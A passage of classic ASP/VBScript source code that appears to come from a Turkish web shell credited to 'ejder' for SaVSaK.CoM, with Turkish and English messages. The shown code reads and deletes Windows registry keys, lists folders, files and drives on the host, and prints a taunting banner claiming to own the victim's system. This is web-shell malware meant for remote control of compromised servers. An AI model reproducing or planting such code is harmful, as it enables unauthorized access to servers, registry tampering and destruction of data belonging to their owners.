Değer/Value: " response.write SaVSaK.RegRead (Trim(hash5)) response.write "
" if err<>0 then olmadi("Kayıt Register larda bulunamadı...") end if else if hash6 = "sil" then yazorta("Mevki/Key: "&Trim(hash5)&"") on error resume next hash9 = SaVSaK.RegDelete (Trim(hash5)) if err<>0 then olmadi("Registerlardan Silinemedi. KEy yanlış olabilir. yada kayıt bulanamadı.") else oldu("Başarıyla Silindi. ") end if end if end if end if end if yazortaa("Written by ejder for SaVSaK.CoM") END SELECT if popup = False AND nolist = False then response.write "

" response.write "
" Call KlasorOku() response.write "
" Call DosyaOku() response.write "
" end if if popup = False then response.write "

" response.write "" Call Suruculer response.write "
Sürücüler


" Call SurucuInfo yazortaa("WrittenBy_ejder Says; My Ownz Your System! But You Are Still N0t Here! L0L : ) ") end if %>